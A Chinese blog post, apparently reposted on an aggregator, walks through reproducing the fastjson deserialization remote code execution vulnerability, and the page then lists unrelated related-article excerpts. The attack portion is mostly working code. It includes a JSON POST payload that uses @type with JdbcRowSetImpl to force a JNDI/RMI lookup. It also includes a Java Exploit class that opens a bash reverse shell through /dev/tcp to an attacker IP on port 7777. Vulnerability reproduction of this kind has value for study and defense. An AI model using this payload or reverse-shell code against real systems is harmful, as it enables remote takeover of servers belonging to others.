fastjson远程命令执行

news2024/11/23 17:01:06

fastjson远程代码执行

漏洞原因：fastjson在对json字符串反序列化的时候，会读取到@type的内容，将json内容反序列化为java对象并调用这个类的setter方法。

1、搭建rmi服务

直接利用jndi-exploit工具
在这里插入图片描述

2、抓包改为POST。开启nc监听、发包

POST的json数据：

Content-Type: application/json
Content-Length: 你的数据长度

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"开的RMI服务",
        "autoCommit":true
    }
}

这里响应400不用管（环境原因）。vps上看到反弹shell是收到了的
在这里插入图片描述
收到shell

使用恶意文件反弹shell过程

// javac Exploit.java
import java.lang.Runtime;
import java.lang.Process;
 
public class Exploit {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.200.131/7777 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

具体过程和log4j2一样。
可以看看上一篇文章
log4j2漏洞复现

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1015717.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

Python 函数的定义

Python 函数的定义

视频版教程 Python3零基础7天入门实战视频教程函数函数是执行特定任务的一段代码，程序通过将一段代码定义成函数，并为该函数指定一个函数名，这样即可在需要的时候多次调用这段代码。比如我们前面学到的range()函数，就是系统…

阅读更多...

js dispatchEvent派发自定义事件

js dispatchEvent派发自定义事件

低版本IE浏览器不兼容 dispatchEvent使用在标准浏览器提供了元素触发自定义事件的方法 element.dispatchEvent()，就是说，我们可以不用在DOM上点击按钮触发事件，在代码里通过 dispatchEvent（）就能触发事件。如下&…

阅读更多...

【Shiro】入门概述

【Shiro】入门概述

1.是什么 Apache Shiro 是一个功能强大且易于使用的 Java 安全(权限)框架。Shiro 可以完成：认证、授权、加密、会话管理、与 Web 集成、缓存等。借助 Shiro 您可以快速轻松地保护任何应用程序——从最小的移动应用程序到最大的 Web 和企业应用程序。官网&…

阅读更多...

使用 React Native 针对 Android 进行开发

使用 React Native 针对 Android 进行开发

🎬 岸边的风：个人主页 🔥 个人专栏 :《 VUE 》《 javaScript 》 ⛺️ 生活的理想，就是为了理想的生活 ! 目录概述通过安装所需工具开始使用 React Native 创建新的 React Native 项目本指南将有助于开始使用 Windows 上的…

阅读更多...

【操作系统】聊聊进程间通信方式

【操作系统】聊聊进程间通信方式

作为操作系统软件治理的核心进程，那么进程间通信的方式就非常重要，常见的比如管道、消息队列、共享内存、信号量、信号、Socket等。本篇主要简单介绍下我们知道每个进程都有自己独立的用户空间，而内核空间是共享的。管道 ps -ef | gre…

阅读更多...

大数据与云计算——让我们进入数字化的新纪元

大数据与云计算——让我们进入数字化的新纪元

当谈论大数据和云计算时，我们进入了一个数字化时代的新纪元。这两个领域在科技和商业领域都有着深远的影响，改变了我们如何处理和存储数据，以及如何进行计算和分析。本文将探讨大数据和云计算的基本概念，它们的关系以及它们在不同…

阅读更多...

YOLO Magic - 强化YOLOv5的视觉任务框架

YOLO Magic - 强化YOLOv5的视觉任务框架

YOLO Magic🚀 - 强化YOLOv5的视觉任务框架 YOLO Magic🪄是一个基于Ultralytics YOLOv5 v7.0 版本的扩展，旨在为视觉任务提供更强大的功能和更简单的操作。它在YOLOv5的基础上引入了丰富的网络模块，并提供了直观易用的Web操作界面&…

阅读更多...

mysql如何实现根据经纬度判断某一个坐标是否在一个多边形区域范围内

mysql如何实现根据经纬度判断某一个坐标是否在一个多边形区域范围内

要根据经纬度判断一个坐标是否在一个多边形区域内，MySQL提供了几种函数来处理地理空间数据，其中包括用于处理多边形区域的函数。 1.创建一个包含多边形区域的表： 首先，创建一个表来存储多边形区域。可以使用ST_GeomFromText函数将…

阅读更多...

Java集合之LinedList

Java集合之LinedList

LinedList类实现了List接口，他提供了（双向的）链表数据结构在该链表中的每一个元素除了存储本身的内容之外还存储指向前一个元素的指针和指向后一个元素的指针，下图展示了一个包含三个元素的双向链表，每个链表都有一个…

阅读更多...

C#使用DirectX SDK 加载.x三维模型

C#使用DirectX SDK 加载.x三维模型

最近因为项目要做显示一个三维模型，所以研究了下如何在Winform中加载并显示三维模型。在Windows平台巨硬公司提供了DirectX SDK用于渲染图形，参考了几篇文章做了个demo记录下，以便日后温习只用。这个SDK涉及到了计算机图形学的一些基础知识&a…

阅读更多...

听GPT 讲Istio源代码--operator

听GPT 讲Istio源代码--operator

File: istio/istioctl/pkg/waypoint/waypoint.go 在Istio项目中，istio/istioctl/pkg/waypoint/waypoint.go文件是istioctl的源代码之一，用于管理Istio的路由规则。 revision变量用于指定Istio的版本号，例如可以值 v1.2.3。这个版本号用于检索…

阅读更多...

openGauss学习笔记-71 openGauss 数据库管理-创建和管理普通表-删除表中数据

openGauss学习笔记-71 openGauss 数据库管理-创建和管理普通表-删除表中数据

文章目录 openGauss学习笔记-71 openGauss 数据库管理-创建和管理普通表-删除表中数据 openGauss学习笔记-71 openGauss 数据库管理-创建和管理普通表-删除表中数据在使用表的过程中，可能会需要删除已过期的数据，删除数据必须从表中整行的删除。 SQL不…

阅读更多...

arcgis拓扑检查实现多个矢量数据之间消除重叠区域

arcgis拓扑检查实现多个矢量数据之间消除重叠区域

目录环境介绍： 操作任务： 步骤： 1、数据库和文件结构准备 2、建立拓扑规则 3、一直下一页默认参数后，进行拓扑检查 4、打开TP_CK_Topology，会自动带出拓扑要素，红色区域为拓扑错误的地方&#xff1…

阅读更多...

Python 魔法方法

Python 魔法方法

视频版教程 Python3零基础7天入门实战视频教程 Python的魔法方法，也称为特殊方法或双下划线方法，是一种特殊的方法，用于在类中实现一些特殊的功能。这些方法的名称始终以双下划线开头和结尾，例如__init__，repr&#x…

阅读更多...

NV040D语音芯片丨助力空气净化器语音功能

NV040D语音芯片丨助力空气净化器语音功能

空气净化器通过过滤网和电子静电等技术，可以清除室内空气中的有害物质，如灰尘、花粉、细菌、甲醛等，达到净化空气的目标，让人们呼吸到更加清新的空气，保护人体健康。在空气净化器中加入九芯语音芯片的提醒功能&#xf…

阅读更多...

jvm 内存模型介绍

jvm 内存模型介绍

一、类加载子系统 1、类加载的过程：装载、链接、初始化，其中，链接又分为验证、准备和解析装载：加载class文件验证：确保字节流中包含信息符合当前虚拟机要求准备：分配内存，设置初始值解析&a…

阅读更多...

Nginx运维知识基础详解

Nginx运维知识基础详解

一. nginx简介 1. nginx介绍 nginx是一个HTTP和反向代理服务器，邮件代理服务器，通用的TCP/UDP代理服务器。反向代理服务器： 作用就是负载均衡 2. 编译安装 #!/bin/bash#新建文件夹存放nginx源码包 mkdir -p /nginx cd /nginx# 下载nginx压…

阅读更多...

2023-数仓建设规范指南

2023-数仓建设规范指南

一、数据模型架构原则 1. 数仓分层原则优秀可靠的数仓体系，往往需要清晰的数据分层结构，即要保证数据层的稳定又要屏蔽对下游的影响，并且要避免链路过长。那么问题来了，一直在讲数仓要分层，那数仓分几层最好&#x…

阅读更多...

redis--windows配置--redis基础

redis--windows配置--redis基础

写在前面： 文章目录 win安装配置密码配置服务服务已经存在可视化工具运行类型基础类型帮助文档命令通用命令string命令hashlistsetsortedset win安装下载地址然后一路next就可以了。记得添加到环境变量配置密码在目录打开配置文件搜索requirepass …

阅读更多...

任意区域的色彩一致性处理方法

任意区域的色彩一致性处理方法

影像任意感兴趣区域的色彩一致性处理方法，主要是针对掩膜后的影像，类似下图，对非背景区域的像素进行处理其中非黑色部分我们叫待匀色区域。这种处理对于wallis 和直方图匹配很容易实现，但是颜色转移就相对而言困难点。颜…

阅读更多...

推荐文章

最新文章